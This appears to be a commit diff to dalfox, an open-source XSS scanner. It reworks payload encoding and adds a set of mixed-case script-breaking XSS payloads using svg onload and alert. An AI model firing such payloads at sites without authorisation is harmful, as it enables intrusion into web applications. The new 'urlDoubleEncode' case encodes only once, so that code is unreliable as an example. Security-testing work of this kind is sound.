(#364) Improve PA logic and inJS Scan

hahwul · hahwul · commit f4c9c7b28e4b · 2022-06-04T01:37:09.000+09:00
diff --git a/pkg/optimization/optimization.go b/pkg/optimization/optimization.go
@@ -141,6 +141,10 @@ func MakeRequestQuery(target, param, payload, ptype string, pAction string, pEnc
 		payload = UrlEncode(payload)
 		break
 
+	case "urlDoubleEncode":
+		payload = (UrlEncode(payload))
+		break
+
 	case "htmlEncode":
 		payload = template.HTMLEscapeString(payload)
 		break
diff --git a/pkg/scanning/parameterAnlaysis.go b/pkg/scanning/parameterAnlaysis.go
@@ -18,6 +18,7 @@ import (
 	"github.com/hahwul/dalfox/v2/pkg/verification"
 	voltFile "github.com/hahwul/volt/file"
 	vlogger "github.com/hahwul/volt/logger"
+	voltUtils "github.com/hahwul/volt/util"
 )
 
 func setP(p, dp url.Values, name string, options model.Options) (url.Values, url.Values) {
@@ -270,26 +271,27 @@ func ParameterAnalysis(target string, options model.Options, rl *rateLimiter) ma
 							char := c
 							go func() {
 								defer wg.Done()
-								turl, _ := optimization.MakeRequestQuery(target, k, "dalfox"+char, "PA-URL", "toAppend", "NaN", options)
-								rl.Block(tempURL.Host)
-								_, _, _, vrs, _ := SendReq(turl, "dalfox"+char, options)
-								if vrs {
-									mutex.Lock()
-									params[k] = append(params[k], char)
-									mutex.Unlock()
+								encoders := []string{
+									"NaN",
+									"urlEncode",
+									"urlDoubleEncode",
+									"htmlEncode",
 								}
 
-								turl, _ = optimization.MakeRequestQuery(target, k, char+"dalfox", "PA-URL", "toPreset", "NaN", options)
-								rl.Block(tempURL.Host)
-								_, _, _, vrs, _ = SendReq(turl, "dalfox"+char, options)
-								if vrs {
-									mutex.Lock()
-									params[k] = append(params[k], char)
-									mutex.Unlock()
+								for _, encoder := range encoders {
+									turl, _ := optimization.MakeRequestQuery(target, k, "dalfox"+char, "PA-URL", "toAppend", encoder, options)
+									rl.Block(tempURL.Host)
+									_, _, _, vrs, _ := SendReq(turl, "dalfox"+char, options)
+									if vrs {
+										mutex.Lock()
+										params[k] = append(params[k], char)
+										mutex.Unlock()
+									}
 								}
 							}()
 						}
 						wg.Wait()
+						params[k] = voltUtils.UniqueStringSlice(params[k])
 						params[k] = append(params[k], code)
 					}
 				}
@@ -368,18 +370,28 @@ func ParameterAnalysis(target string, options model.Options, rl *rateLimiter) ma
 
 							go func() {
 								defer wg.Done()
-								turl, _ := optimization.MakeRequestQuery(target, k, "dalfox"+char, "PA", "toAppend", "NaN", options)
-								rl.Block(tempURL.Host)
-								_, _, _, vrs, _ := SendReq(turl, "dalfox"+char, options)
-								_ = resp
-								if vrs {
-									mutex.Lock()
-									params[k] = append(params[k], char)
-									mutex.Unlock()
+								encoders := []string{
+									"NaN",
+									"urlEncode",
+									"urlDoubleEncode",
+									"htmlEncode",
+								}
+
+								for _, encoder := range encoders {
+									turl, _ := optimization.MakeRequestQuery(target, k, "dalfox"+char, "PA", "toAppend", encoder, options)
+									rl.Block(tempURL.Host)
+									_, _, _, vrs, _ := SendReq(turl, "dalfox"+char, options)
+									_ = resp
+									if vrs {
+										mutex.Lock()
+										params[k] = append(params[k], char)
+										mutex.Unlock()
+									}
 								}
 							}()
 						}
 						wg.Wait()
+						params[k] = voltUtils.UniqueStringSlice(params[k])
 						params[k] = append(params[k], code)
 					}
 				}
diff --git a/pkg/scanning/payload.go b/pkg/scanning/payload.go
@@ -50,6 +50,12 @@ func GetInJsPayload() ([]string, int) {
 	return lst, len(lst)
 }
 
+// GetInJsBreakScriptPayload is exported interface
+func GetInJsBreakScriptPayload() ([]string, int) {
+	lst := getInJsBreakScriptPayload("")
+	return lst, len(lst)
+}
+
 //basic open redirect payloads
 func getOpenRedirectPayload() []string {
 	payload := []string{
@@ -443,6 +449,20 @@ func getAttrPayload(ip string) []string {
 	return payload
 }
 
+func getInJsBreakScriptPayload(ip string) []string {
+	payload := []string{
+		"</sCRipt><sVg/onload=alert(DALFOX_ALERT_VALUE)>",
+		"</scRiPt><sVG/onload=confirm(DALFOX_ALERT_VALUE)>",
+		"</sCrIpt><SVg/onload=prompt(DALFOX_ALERT_VALUE)>",
+		"</sCrIpt><SVg/onload=print(DALFOX_ALERT_VALUE)>",
+		"</sCriPt><ScRiPt>alert(DALFOX_ALERT_VALUE)</sCrIpt>",
+		"</scRipT><sCrIpT>confirm(DALFOX_ALERT_VALUE)</SCriPt>",
+		"</ScripT><ScRIpT>prompt(DALFOX_ALERT_VALUE)</scRIpT>",
+		"</ScripT><ScRIpT>print(DALFOX_ALERT_VALUE)</scRIpT>",
+	}
+	return payload
+}
+
 func getInJsPayload(ip string) []string {
 	payload := []string{
 		"alert(DALFOX_ALERT_VALUE)",
@@ -455,14 +475,6 @@ func getInJsPayload(ip string) []string {
 		"alert.apply(null,[DALFOX_ALERT_VALUE])",
 		"prompt.apply(null,[DALFOX_ALERT_VALUE])",
 		"confirm.apply(null,[DALFOX_ALERT_VALUE])",
-		"</sCRipt><sVg/onload=alert(DALFOX_ALERT_VALUE)>",
-		"</scRiPt><sVG/onload=confirm(DALFOX_ALERT_VALUE)>",
-		"</sCrIpt><SVg/onload=prompt(DALFOX_ALERT_VALUE)>",
-		"</sCrIpt><SVg/onload=print(DALFOX_ALERT_VALUE)>",
-		"</sCriPt><ScRiPt>alert(DALFOX_ALERT_VALUE)</sCrIpt>",
-		"</scRipT><sCrIpT>confirm(DALFOX_ALERT_VALUE)</SCriPt>",
-		"</ScripT><ScRIpT>prompt(DALFOX_ALERT_VALUE)</scRIpT>",
-		"</ScripT><ScRIpT>print(DALFOX_ALERT_VALUE)</scRIpT>",
 		"window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])",
 		"this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])",
 		"self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])",
@@ -476,6 +488,14 @@ func getInJsPayload(ip string) []string {
 		"window[/*foo*/'confirm'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])",
 		"{{toString().constructor.constructor('alert(DALFOX_ALERT_VALUE)')()}}",
 		"{{-function(){this.alert(DALFOX_ALERT_VALUE)}()}}",
+		"</sCRipt><sVg/onload=alert(DALFOX_ALERT_VALUE)>",
+		"</scRiPt><sVG/onload=confirm(DALFOX_ALERT_VALUE)>",
+		"</sCrIpt><SVg/onload=prompt(DALFOX_ALERT_VALUE)>",
+		"</sCrIpt><SVg/onload=print(DALFOX_ALERT_VALUE)>",
+		"</sCriPt><ScRiPt>alert(DALFOX_ALERT_VALUE)</sCrIpt>",
+		"</scRipT><sCrIpT>confirm(DALFOX_ALERT_VALUE)</SCriPt>",
+		"</ScripT><ScRIpT>prompt(DALFOX_ALERT_VALUE)</scRIpT>",
+		"</ScripT><ScRIpT>print(DALFOX_ALERT_VALUE)</scRIpT>",
 	}
 	if strings.Contains(ip, "none") {
 		var tempPayload []string
diff --git a/pkg/scanning/scan.go b/pkg/scanning/scan.go
@@ -297,15 +297,16 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 										ptype = GetPType(av)
 									}
 								}
-								// Add plain XSS Query
-								tq, tm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", "NaN", options)
-								query[tq] = tm
-								// Add URL encoded XSS Query
-								etq, etm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", "urlEncode", options)
-								query[etq] = etm
-								// Add HTML Encoded XSS Query
-								htq, htm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", "htmlEncode", options)
-								query[htq] = htm
+								encoders := []string{
+									"NaN",
+									"urlEncode",
+									"urlDoubleEncode",
+									"htmlEncode",
+								}
+								for _, encoder := range encoders {
+									tq, tm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", encoder, options)
+									query[tq] = tm
+								}
 							}
 						}
 					}
@@ -340,15 +341,16 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 					cpArr = append(cpArr, v)
 					arc := optimization.SetPayloadValue(getCommonPayload(), options)
 					for _, avv := range arc {
-						// Add plain XSS Query
-						tq, tm := optimization.MakeRequestQuery(target, v, avv, "inHTML-URL", "toAppend", "NaN", options)
-						query[tq] = tm
-						// Add URL encoded XSS Query
-						etq, etm := optimization.MakeRequestQuery(target, v, avv, "inHTML-URL", "toAppend", "urlEncode", options)
-						query[etq] = etm
-						// Add HTML Encoded XSS Query
-						htq, htm := optimization.MakeRequestQuery(target, v, avv, "inHTML-URL", "toAppend", "htmlEncode", options)
-						query[htq] = htm
+						encoders := []string{
+							"NaN",
+							"urlEncode",
+							"urlDoubleEncode",
+							"htmlEncode",
+						}
+						for _, encoder := range encoders {
+							tq, tm := optimization.MakeRequestQuery(target, v, avv, "inHTML-URL", "toAppend", encoder, options)
+							query[tq] = tm
+						}
 					}
 				}
 			}
@@ -358,15 +360,16 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 					cpdArr = append(cpdArr, v)
 					arc := optimization.SetPayloadValue(getCommonPayload(), options)
 					for _, avv := range arc {
-						// Add plain XSS Query
-						tq, tm := optimization.MakeRequestQuery(target, v, avv, "inHTML-FORM", "toAppend", "NaN", options)
-						query[tq] = tm
-						// Add URL encoded XSS Query
-						etq, etm := optimization.MakeRequestQuery(target, v, avv, "inHTML-FORM", "toAppend", "urlEncode", options)
-						query[etq] = etm
-						// Add HTML Encoded XSS Query
-						htq, htm := optimization.MakeRequestQuery(target, v, avv, "inHTML-FORM", "toAppend", "htmlEncode", options)
-						query[htq] = htm
+						encoders := []string{
+							"NaN",
+							"urlEncode",
+							"urlDoubleEncode",
+							"htmlEncode",
+						}
+						for _, encoder := range encoders {
+							tq, tm := optimization.MakeRequestQuery(target, v, avv, "inHTML-FORM", "toAppend", encoder, options)
+							query[tq] = tm
+						}
 					}
 				}
 			}
@@ -445,10 +448,30 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 							// Injected pattern
 							injectedPoint := strings.Split(av, "/")
 							injectedPoint = injectedPoint[1:]
+							injectedChars := params[k][:len(params[k])-1]
 							for _, ip := range injectedPoint {
 								var arr []string
 								if strings.Contains(ip, "inJS") {
-									arr = optimization.SetPayloadValue(getInJsPayload(ip), options)
+									checkInJS := false
+									if strings.Contains(ip, "double") {
+										for _, injectedChar := range injectedChars {
+											if strings.Contains(injectedChar, "\"") {
+												checkInJS = true
+											}
+										}
+									}
+									if strings.Contains(ip, "single") {
+										for _, injectedChar := range injectedChars {
+											if strings.Contains(injectedChar, "'") {
+												checkInJS = true
+											}
+										}
+									}
+									if checkInJS {
+										arr = optimization.SetPayloadValue(getInJsPayload(ip), options)
+									} else {
+										arr = optimization.SetPayloadValue(getInJsBreakScriptPayload(ip), options)
+									}
 								}
 								if strings.Contains(ip, "inHTML") {
 									arr = optimization.SetPayloadValue(getHTMLPayload(ip), options)
@@ -458,15 +481,16 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 								}
 								for _, avv := range arr {
 									if optimization.Optimization(avv, badchars) {
-										// Add plain XSS Query
-										tq, tm := optimization.MakeRequestQuery(target, k, avv, ip+ptype, "toAppend", "NaN", options)
-										query[tq] = tm
-										// Add URL Encoded XSS Query
-										etq, etm := optimization.MakeRequestQuery(target, k, avv, ip+ptype, "toAppend", "urlEncode", options)
-										query[etq] = etm
-										// Add HTML Encoded XSS Query
-										htq, htm := optimization.MakeRequestQuery(target, k, avv, ip+ptype, "toAppend", "htmlEncode", options)
-										query[htq] = htm
+										encoders := []string{
+											"NaN",
+											"urlEncode",
+											"urlDoubleEncode",
+											"htmlEncode",
+										}
+										for _, encoder := range encoders {
+											tq, tm := optimization.MakeRequestQuery(target, k, avv, ip+ptype, "toAppend", encoder, options)
+											query[tq] = tm
+										}
 									}
 								}
 							}
@@ -477,15 +501,16 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 					for _, avv := range arc {
 						if !containsFromArray(cpArr, k) {
 							if optimization.Optimization(avv, badchars) {
-								// Add plain XSS Query
-								tq, tm := optimization.MakeRequestQuery(target, k, avv, "inHTML"+ptype, "toAppend", "NaN", options)
-								query[tq] = tm
-								// Add URL encoded XSS Query
-								etq, etm := optimization.MakeRequestQuery(target, k, avv, "inHTML"+ptype, "toAppend", "urlEncode", options)
-								query[etq] = etm
-								// Add HTML Encoded XSS Query
-								htq, htm := optimization.MakeRequestQuery(target, k, avv, "inHTML"+ptype, "toAppend", "htmlEncode", options)
-								query[htq] = htm
+								encoders := []string{
+									"NaN",
+									"urlEncode",
+									"urlDoubleEncode",
+									"htmlEncode",
+								}
+								for _, encoder := range encoders {
+									tq, tm := optimization.MakeRequestQuery(target, k, avv, "inHTML"+ptype, "toAppend", encoder, options)
+									query[tq] = tm
+								}
 							}
 						}
 					}
@@ -530,17 +555,17 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 					for _, bpayload := range bpayloads {
 						// Add plain XSS Query
 						bp := strings.Replace(bpayload, "CALLBACKURL", bcallback, 10)
-						tq, tm := optimization.MakeRequestQuery(target, k, bp, "toBlind"+ptype, "toAppend", "NaN", options)
-						tm["payload"] = "toBlind"
-						query[tq] = tm
-						// Add URL encoded XSS Query
-						etq, etm := optimization.MakeRequestQuery(target, k, bp, "toBlind"+ptype, "toAppend", "urlEncode", options)
-						etm["payload"] = "toBlind"
-						query[etq] = etm
-						// Add HTML Encoded XSS Query
-						htq, htm := optimization.MakeRequestQuery(target, k, bp, "toBlind"+ptype, "toAppend", "htmlEncode", options)
-						htm["payload"] = "toBlind"
-						query[htq] = htm
+						encoders := []string{
+							"NaN",
+							"urlEncode",
+							"urlDoubleEncode",
+							"htmlEncode",
+						}
+						for _, encoder := range encoders {
+							tq, tm := optimization.MakeRequestQuery(target, k, bp, "toBlind"+ptype, "toAppend", encoder, options)
+							tm["payload"] = "toBlind"
+							query[tq] = tm
+						}
 					}
 				}
 			}
@@ -572,15 +597,16 @@ func Scan(target string, options model.Options, sid string) (model.Result, error
 											ptype = GetPType(av)
 										}
 									}
-									// Add plain XSS Query
-									tq, tm := optimization.MakeRequestQuery(target, k, remotePayload, "inHTML"+ptype, "toAppend", "NaN", options)
-									query[tq] = tm
-									// Add URL encoded XSS Query
-									etq, etm := optimization.MakeRequestQuery(target, k, remotePayload, "inHTML"+ptype, "toAppend", "urlEncode", options)
-									query[etq] = etm
-									// Add HTML Encoded XSS Query
-									htq, htm := optimization.MakeRequestQuery(target, k, remotePayload, "inHTML"+ptype, "toAppend", "htmlEncode", options)
-									query[htq] = htm
+									encoders := []string{
+										"NaN",
+										"urlEncode",
+										"urlDoubleEncode",
+										"htmlEncode",
+									}
+									for _, encoder := range encoders {
+										tq, tm := optimization.MakeRequestQuery(target, k, remotePayload, "inHTML"+ptype, "toAppend", encoder, options)
+										query[tq] = tm
+									}
 								}
 							}
 						}
